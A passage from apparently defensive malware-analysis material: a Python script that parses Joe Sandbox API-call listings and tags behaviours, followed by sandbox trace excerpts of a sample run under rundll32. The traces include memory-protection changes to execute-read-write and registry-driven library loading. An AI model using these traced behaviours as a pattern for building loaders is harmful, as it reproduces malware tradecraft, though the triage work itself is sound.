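CALL_RE = re.compile(
    r"^\s*\u2022\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

# Win32 constants worth naming when they appear in captured argument slots.
HKEY = {"80000000": "HKEY_CLASSES_ROOT", "80000001": "HKEY_CURRENT_USER",
        "80000002": "HKEY_LOCAL_MACHINE", "80000003": "HKEY_USERS"}
REG_TYPE = {"00000000": "REG_NONE", "00000001": "REG_SZ", "00000002": "REG_EXPAND_SZ",
            "00000003": "REG_BINARY", "00000004": "REG_DWORD", "00000007": "REG_MULTI_SZ"}
PAGE_PROT = {"00000002": "PAGE_READONLY", "00000004": "PAGE_READWRITE",
             "00000020": "PAGE_EXECUTE_READ", "00000040": "PAGE_EXECUTE_READWRITE"}
CODEPAGE = {"00000000": "CP_ACP", "0000FDE9": "CP_UTF8"}

# Hypothetical triage rules (assumption, not sandbox logic): a function carrying
# all APIs of a set gets that tag.
RULES = {
    "host_fingerprint": {"GetUserNameW", "GetComputerNameW"},
    "registry_write": {"RegSetValueExA"},
    "temp_file_drop": {"GetTempFileNameA"},
    "file_delete": {"DeleteFileA"},
    "file_read": {"CreateFileW", "ReadFile"},
    "page_protection_change": {"VirtualProtect"},
}


def parse_api_blocks(text):
    """Split report text at each 'APIs' header and parse every bullet into a call
    record: api, module, args (as printed), ref address, and the subcall owner if
    the line is an indirect 'Part of subcall function' entry."""
    blocks, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            blocks.append(current)
            continue
        m = CALL_RE.match(line)
        if not m or current is None:
            continue
        raw = m.group("args")
        args = [] if raw is None else [a.strip() for a in raw.split(",")]
        current.append({"api": m.group("api"), "module": m.group("mod"),
                        "args": args, "ref": m.group("ref"), "subcall_of": m.group("sub")})
    return [b for b in blocks if b]


def decode_args(call):
    """Name the constant-valued arguments recorded for a few APIs. A '?' slot means
    the sandbox could not recover the value on that invocation; it is skipped."""
    a, out = call["args"], {}

    def pick(i, table, name):
        if i < len(a) and a[i] in table:
            out[name] = table[a[i]]

    if call["api"] in ("RegCreateKeyA", "RegOpenKeyA", "RegCreateKeyExA", "RegOpenKeyExA"):
        pick(0, HKEY, "hKey")
    elif call["api"] in ("RegSetValueExA", "RegSetValueExW"):
        pick(3, REG_TYPE, "dwType")
    elif call["api"] == "VirtualProtect":
        pick(2, PAGE_PROT, "flNewProtect")
    elif call["api"] == "WideCharToMultiByte":
        pick(0, CODEPAGE, "CodePage")
    return out


def classify(block, direct_only=True):
    """Tags for one function. By default subcall entries are ignored so a function
    is not credited with what its callee does (RtlAllocateHeap above, for example)."""
    names = {c["api"] for c in block if not (direct_only and c["subcall_of"])}
    return {tag for tag, needed in RULES.items() if needed <= names}


def triage(text):
    """Per function: first observed call site, behaviour tags, decoded constants."""
    report = []
    for block in parse_api_blocks(text):
        decoded = {}
        for c in block:
            d = decode_args(c)
            if d:
                decoded[c["api"]] = d
        report.append({"first_ref": block[0]["ref"],
                       "tags": sorted(classify(block)), "constants": decoded})
    return report


if __name__ == "__main__":
    for entry in triage(SAMPLE_REPORT):
        print(entry["first_ref"], entry["tags"], entry["constants"])
```

The argument values in these listings are whatever the sandbox captured on one invocation, so a decoded constant says what that call did once, not what every call from that site does; treat the tags as pointers for manual review of the function at the printed `ref` address, not as verdicts.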

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(0627980C,?,?,?,?,00000008,0627980C,00000000,?), ref: 0627E59A
                                                          • memcpy.NTDLL(0627980C,?,00000009,?,?,?,?,00000008,0627980C,00000000,?), ref: 0627E5BC
                                                          • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 0627E5D4
                                                          • lstrlenW.KERNEL32(00000000,00000001,0627980C,?,?,?,?,?,?,?,00000008,0627980C,00000000,?), ref: 0627E5F4
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00000008,0627980C,00000000,?), ref: 0627E619
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3065863707-0
                                                          • Opcode ID: 6263507036f8939742462d7dcd370afe7bf2b31385f1d3a6e87d913e50889c5e
                                                          • Instruction ID: 06cca986146bdaed4c4f7f06cacb906b79549584578ace593dfbb7f001f14bb8
                                                          • Opcode Fuzzy Hash: 6263507036f8939742462d7dcd370afe7bf2b31385f1d3a6e87d913e50889c5e
                                                          • Instruction Fuzzy Hash: 66115E75E01309BBCB619BA5EC0DF8E7BB9AB48354F008051FA59E6280E6749648CBB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrcmpi.KERNEL32(00000000,?), ref: 0628FEC3
                                                          • RtlEnterCriticalSection.NTDLL(0629A428), ref: 0628FED0
                                                          • RtlLeaveCriticalSection.NTDLL(0629A428), ref: 0628FEE3
                                                          • lstrcmpi.KERNEL32(0629A440,00000000), ref: 0628FF03
                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0627404D,00000000), ref: 0628FF17
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                                                          • String ID:
                                                          • API String ID: 1266740956-0
                                                          • Opcode ID: d63a575070c2a16e5a761e39e5e0f6b8dc037304184f62a1ab075e69b90a4bc6
                                                          • Instruction ID: 091e62abaef7d16aafb1eed0d5f9ea41a3f1dc66d03c8b56633d5613476e4cb9
                                                          • Opcode Fuzzy Hash: d63a575070c2a16e5a761e39e5e0f6b8dc037304184f62a1ab075e69b90a4bc6
                                                          • Instruction Fuzzy Hash: 0E117F32921306AFDB45DB58E84DA99B7E9FB99328F144055ED0997280D7349D01CFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000000,06293716,00000000,06282466,?,?,?,06288A07,?,?,?,00000000,00000001,00000000,?), ref: 0627326D
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 06273291
                                                          • StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,06288A07,?,?,?,00000000,00000001,00000000,?,00000000), ref: 06273298
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 062732E0
                                                          • lstrcat.KERNEL32(00000000,?), ref: 062732EF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                                                          • String ID:
                                                          • API String ID: 2616531654-0
                                                          • Opcode ID: dbfd3582f809a5d739546aa672fb49b85c669ecc842cf94a11260e786bcb33a1
                                                          • Instruction ID: e64f1563530d317461424ee925709cac91e7b2569eafc596eadaabd71d4da029
                                                          • Opcode Fuzzy Hash: dbfd3582f809a5d739546aa672fb49b85c669ecc842cf94a11260e786bcb33a1
                                                          • Instruction Fuzzy Hash: 9211A072610307ABD761DA69EC8CF6BB7EDABC9210F080029FA05D3540EB34D945DBB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0628D580: lstrlen.KERNEL32(00000000,00000000,?,00000000,0627243E,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 0628D58C
                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0628E3F6
                                                          • memcpy.NTDLL(00000000,?,?), ref: 0628E409
                                                          • RtlEnterCriticalSection.NTDLL(0629A428), ref: 0628E41A
                                                          • RtlLeaveCriticalSection.NTDLL(0629A428), ref: 0628E42F
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0628E467
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 2349942465-0
                                                          • Opcode ID: 74313821edc8ee6e6160d5d052f4d7f3e12e14323ceaf5d8ba1da48f2c5deee3
                                                          • Instruction ID: e83b48718d5cde9f7299f7f721e35e638e2275c7567bc26eeb09bcc0a2c78967
                                                          • Opcode Fuzzy Hash: 74313821edc8ee6e6160d5d052f4d7f3e12e14323ceaf5d8ba1da48f2c5deee3
                                                          • Instruction Fuzzy Hash: 13110272222310AFC7512F24EC4CC2B77EAEBC9325701412AFE5993240DA315C04CEB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(0627C1F8,00000000,00000000,00000000,?,06280FD9,?,0627C1F8,00000000), ref: 06284D2D
                                                          • lstrlen.KERNEL32(?,?,06280FD9,?,0627C1F8,00000000), ref: 06284D34
                                                          • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 06284D42
                                                            • Part of subcall function 0627EEF2: GetLocalTime.KERNEL32(?,?,?,?,0628FC9E,00000000,00000001), ref: 0627EEFC
                                                            • Part of subcall function 0627EEF2: wsprintfA.USER32 ref: 0627EF2F
                                                          • wsprintfA.USER32 ref: 06284D64
                                                            • Part of subcall function 0627ED48: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,06284D8C,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 0627ED66
                                                            • Part of subcall function 0627ED48: wsprintfA.USER32 ref: 0627ED8B
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 06284D95
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                                                          • String ID:
                                                          • API String ID: 3847261958-0
                                                          • Opcode ID: fbe2d77a77aa61215b8f000a3f550c752809dc4a2699567f0decf6ceddf832a1
                                                          • Instruction ID: b1f61306be93e0eb8c70df9a0b6977888c5730e5bf65655b52eeda380416f083
                                                          • Opcode Fuzzy Hash: fbe2d77a77aa61215b8f000a3f550c752809dc4a2699567f0decf6ceddf832a1
                                                          • Instruction Fuzzy Hash: B3018831501319BFDB512F16EC48E9A7F6EEFC4364F048011FE1896151D6329965DFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000008,00000000,0000EA60,00000000,00000000,00000000,?,0627DBAC,?,?,00000000,06273EC6,?,00000000), ref: 0628DD35
                                                          • ResetEvent.KERNEL32(?,?,0627DBAC,?,?,00000000,06273EC6,?,00000000), ref: 0628DD3A
                                                          • GetLastError.KERNEL32(0627DBAC,?,?,00000000,06273EC6,?,00000000), ref: 0628DD55
                                                          • GetLastError.KERNEL32(0000EA60,00000000,00000000,00000000,?,0627DBAC,?,?,00000000,06273EC6,?,00000000), ref: 0628DD84
                                                            • Part of subcall function 0627D429: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0628DD0F,00000000,00000000,00000004,00000000,?,0627DBAC,?,?,00000000), ref: 0627D435
                                                            • Part of subcall function 0627D429: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0628DD0F,00000000,00000000,00000004,00000000,?,0627DBAC,?), ref: 0627D493
                                                            • Part of subcall function 0627D429: lstrcpy.KERNEL32(00000000,00000000), ref: 0627D4A3
                                                          • SetEvent.KERNEL32(?,0627DBAC,?,?,00000000,06273EC6,?,00000000), ref: 0628DD76
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1449191863-0
                                                          • Opcode ID: 44140ecd52617cf6b284c8908db266d67bf3371c77543812ecf4d932c5aa659e
                                                          • Instruction ID: 36cea533057e05cb6e79db8942cf0113ba0ecb299e575180712240bb75ec5ba7
                                                          • Opcode Fuzzy Hash: 44140ecd52617cf6b284c8908db266d67bf3371c77543812ecf4d932c5aa659e
                                                          • Instruction Fuzzy Hash: 0A115172521606AFDB617F65EC48A9B3BA9EF48364F104A20FD15914E0C731D855DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00004000,-00000008), ref: 06290AB4
                                                            • Part of subcall function 0628EC09: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0628EC20
                                                            • Part of subcall function 0628EC09: SetEvent.KERNEL32(?,?,?,?,06273EC6,?,?), ref: 0628EC30
                                                          • lstrlen.KERNEL32(?,?,?,?,?,0627859B,?,?), ref: 06290AD7
                                                          • lstrlen.KERNEL32(?,?,?,?,0627859B,?,?), ref: 06290AE1
                                                          • memcpy.NTDLL(?,?,00004000,?,?,0627859B,?,?), ref: 06290AF2
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,0627859B,?,?), ref: 06290B14
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heaplstrlen$AllocateEventFreeObjectSingleWaitmemcpy
                                                          • String ID:
                                                          • API String ID: 442095154-0
                                                          • Opcode ID: 77b64abff9f86aea5abcaf5d0851878d1817a31c044e7fa137bb8458469be2ad
                                                          • Instruction ID: 42a2cd721971846c707daa91b10252388b1b379299bf879ed7f0e0cad6acd16a
                                                          • Opcode Fuzzy Hash: 77b64abff9f86aea5abcaf5d0851878d1817a31c044e7fa137bb8458469be2ad
                                                          • Instruction Fuzzy Hash: 26118B75A10209EFCF529F55EC48F5EBBBAEFC9364F204028EA09A3250E6719D04DB70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0627AE7C: lstrlen.KERNEL32(0627E448,00000000,00000000,?,?,06287A5B,?,?,?,?,0627E448,?), ref: 0627AE8B
                                                            • Part of subcall function 0627AE7C: mbstowcs.NTDLL ref: 0627AEA7
                                                          • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,?,?,0627E448,?), ref: 06287A6A
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 06287A7C
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0627E448,?), ref: 06287A99
                                                          • lstrlenW.KERNEL32(00000000,?,?,0627E448,?), ref: 06287AA5
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,0627E448,?), ref: 06287AB9
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                                                          • String ID:
                                                          • API String ID: 3403466626-0
                                                          • Opcode ID: ac34d4c6d163811c064cb283165b903c3eabfd1c126ec6cf7e3e86adb05143f4
                                                          • Instruction ID: 75942f5de5225b504469ef4879a191fea14f0b1134b7eedfdec644b3b13b190e
                                                          • Opcode Fuzzy Hash: ac34d4c6d163811c064cb283165b903c3eabfd1c126ec6cf7e3e86adb05143f4
                                                          • Instruction Fuzzy Hash: C0012972201304BFD712AF99EC88FAE77AEEB89754F140015FA05AB150D7749904CFB5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32 ref: 0627F4BF
                                                          • GetModuleHandleA.KERNEL32 ref: 0627F4CD
                                                          • LoadLibraryExW.KERNEL32(?,?,?), ref: 0627F4DA
                                                          • GetModuleHandleA.KERNEL32 ref: 0627F4F1
                                                          • GetModuleHandleA.KERNEL32 ref: 0627F4FD
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule$LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1178273743-0
                                                          • Opcode ID: ef7596608570f42a97afa3c30cf8d6e3e87eb1df80bb90f5abadccb9533efc1b
                                                          • Instruction ID: d7110e201c4f2b6ae275097eb71e244c789b9b65fb6af4d9509fb03ab9f8f16e
                                                          • Opcode Fuzzy Hash: ef7596608570f42a97afa3c30cf8d6e3e87eb1df80bb90f5abadccb9533efc1b
                                                          • Instruction Fuzzy Hash: 6E016D31A24307AB9F415F69FD48E6A7BAAFF85275708403AFE14D2120DB71C821DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(0629A400), ref: 06291664
                                                          • RtlLeaveCriticalSection.NTDLL(0629A400), ref: 06291675
                                                          • VirtualProtect.KERNEL32(?,00000004,00000040,0000007F,?,?,06284B8B,?,?,0629A428,062725BA,00000003), ref: 0629168C
                                                          • VirtualProtect.KERNEL32(?,00000004,0000007F,0000007F,?,?,06284B8B,?,?,0629A428,062725BA,00000003), ref: 062916A6
                                                          • GetLastError.KERNEL32(?,?,06284B8B,?,?,0629A428,062725BA,00000003), ref: 062916B3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                                          • String ID:
                                                          • API String ID: 653387826-0
                                                          • Opcode ID: fb8fdae7b2c28c0f11fb6d2e778163344fb6411cff640a3aa7587c27275733a6
                                                          • Instruction ID: 45b8b3185f6cca043b935230df08a32f7d30a91a9d2a30c38d383e1a52674dae
                                                          • Opcode Fuzzy Hash: fb8fdae7b2c28c0f11fb6d2e778163344fb6411cff640a3aa7587c27275733a6
                                                          • Instruction Fuzzy Hash: 0B018F75600305AFD7219F25DC09D6AB7B9EFC8224B214129EA5693250D770E905CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,0627396C), ref: 0628BDCC
                                                          • StrTrimA.SHLWAPI(00000001,?,?,0627396C), ref: 0628BDEF
                                                          • StrTrimA.SHLWAPI(00000000,?,?,0627396C), ref: 0628BDFE
                                                          • _strupr.NTDLL ref: 0628BE01
                                                          • lstrlen.KERNEL32(00000000,0627396C), ref: 0628BE09
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Trim$_struprlstrlen
                                                          • String ID:
                                                          • API String ID: 2280331511-0
                                                          • Opcode ID: b6a04071d970be2bf7618d89d0afa7061848703b953ed9a143634c0232f5c37a
                                                          • Instruction ID: a83d82ef76318a9bf0fa864d9d35f67cdcaf7a2a105721dc4c3ffe6cb7c8bfe7
                                                          • Opcode Fuzzy Hash: b6a04071d970be2bf7618d89d0afa7061848703b953ed9a143634c0232f5c37a
                                                          • Instruction Fuzzy Hash: 5BF062717012156FD745AB28FC8CE3F77EEEBCA655B040009FA05CB280DB299C018B70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,06282397,?), ref: 06280820
                                                          • GetVersion.KERNEL32 ref: 0628082F
                                                          • GetCurrentProcessId.KERNEL32 ref: 0628084B
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 06280868
                                                          • GetLastError.KERNEL32 ref: 06280887
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                          • String ID:
                                                          • API String ID: 2270775618-0
                                                          • Opcode ID: c55d6b5b4fd0f232954f239a0cc037d2ab724ff54fbc3a40d110aafdaa68d99d
                                                          • Instruction ID: 71626d0f7e8de0d8ad8611fa11e563fc4c2362ab4d5b010dc4858cf8080d3104
                                                          • Opcode Fuzzy Hash: c55d6b5b4fd0f232954f239a0cc037d2ab724ff54fbc3a40d110aafdaa68d99d
                                                          • Instruction Fuzzy Hash: 2CF04F70A613029FE766AF64BC1EB153B62BBC6785F100125EB4AD61D0D7708088CFB8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 062789FB
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 06278A0B
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 06278A14
                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,06282F34,?,?,00000040,?,?,?,?,?,?,00000000), ref: 06278A32
                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,06282F34,?,?,00000040,?,?,?,?,?,?,00000000), ref: 06278A3F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                                                          • String ID:
                                                          • API String ID: 3667519916-0
                                                          • Opcode ID: f97b0aaffc116abe96752ee8e80bf67d4a48fbaefbd4a8f95e01cf33d04df0ba
                                                          • Instruction ID: b593a2a05316bd9a15b7f706b29b3c32ca53b386cd52e6feddb4d555d4c1b4a0
                                                          • Opcode Fuzzy Hash: f97b0aaffc116abe96752ee8e80bf67d4a48fbaefbd4a8f95e01cf33d04df0ba
                                                          • Instruction Fuzzy Hash: 52F0BE30701701AFEBA16B35EC4CF1AB3B9BF88255F100624FA41A24D0CB38E805CE71
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000000,00000000,?,?,?,?,?), ref: 0628C4A8
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • wsprintfA.USER32 ref: 0628C4D9
                                                            • Part of subcall function 0627AAAF: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,0627A1A1), ref: 0627AAC5
                                                            • Part of subcall function 0627AAAF: wsprintfA.USER32 ref: 0627AAED
                                                            • Part of subcall function 0627AAAF: lstrlen.KERNEL32(?), ref: 0627AAFC
                                                            • Part of subcall function 0627AAAF: wsprintfA.USER32 ref: 0627AB3C
                                                            • Part of subcall function 0627AAAF: wsprintfA.USER32 ref: 0627AB71
                                                            • Part of subcall function 0627AAAF: memcpy.NTDLL(00000000,?,?), ref: 0627AB7E
                                                            • Part of subcall function 0627AAAF: memcpy.NTDLL(00000008,062953E8,00000002,00000000,?,?), ref: 0627AB93
                                                            • Part of subcall function 0627AAAF: wsprintfA.USER32 ref: 0627ABB6
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0628C54E
                                                            • Part of subcall function 06292968: RtlEnterCriticalSection.NTDLL(0689C2D0), ref: 0629297E
                                                            • Part of subcall function 06292968: RtlLeaveCriticalSection.NTDLL(0689C2D0), ref: 06292999
                                                          • HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 0628C538
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0628C544
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
                                                          • String ID:
                                                          • API String ID: 3553201432-0
                                                          • Opcode ID: 8ef011cb56e8bb25e6eb58be3e3760970fdcd5afd99266490b07797cc47d4014
                                                          • Instruction ID: 1b3f64c3273632ab0cfd79f65a24519defe467149bf354c25200d59417a92629
                                                          • Opcode Fuzzy Hash: 8ef011cb56e8bb25e6eb58be3e3760970fdcd5afd99266490b07797cc47d4014
                                                          • Instruction Fuzzy Hash: 8C21F872910249AFCF11EFA9EC88DDF7BBAFB88310B004416FA15A6110D7759A64DFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0627EFBC
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0627EFCD
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0627EFE5
                                                          • CloseHandle.KERNEL32(?), ref: 0627EFFF
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0627F014
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap$CloseHandle
                                                          • String ID:
                                                          • API String ID: 1910495013-0
                                                          • Opcode ID: dc4cd6deab95b39e3594ba15adb7b5309bc93e6406d2bbb84d962c60f62342b9
                                                          • Instruction ID: 01ee40b0a3507b324cefa7f878b8cf1f25ed7d9f6fb78689a2facdaefb3384a2
                                                          • Opcode Fuzzy Hash: dc4cd6deab95b39e3594ba15adb7b5309bc93e6406d2bbb84d962c60f62342b9
                                                          • Instruction Fuzzy Hash: 25212C71611622AFC3529B66EC88D1AFBAAFF89B103550454FD48D3A50C731ECA1DBF1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0627EC00: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 0627EC1B
                                                            • Part of subcall function 0627EC00: LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 0627EC69
                                                            • Part of subcall function 0627EC00: GetProcAddress.KERNEL32(00000000,?), ref: 0627EC82
                                                            • Part of subcall function 0627EC00: RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 0627ECD3
                                                          • GetLastError.KERNEL32(?,?,00000001), ref: 0628987C
                                                          • FreeLibrary.KERNEL32(?,?,00000001), ref: 062898E4
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                                                          • String ID:
                                                          • API String ID: 1730969706-0
                                                          • Opcode ID: 67a7dc6d74505c9eaf6c874b214da9191dbfae3f6445b39d2e55573396b6809e
                                                          • Instruction ID: ef0f70e35d9147d90d5085e5d2f590041255574f0565b515dbf348995859d20c
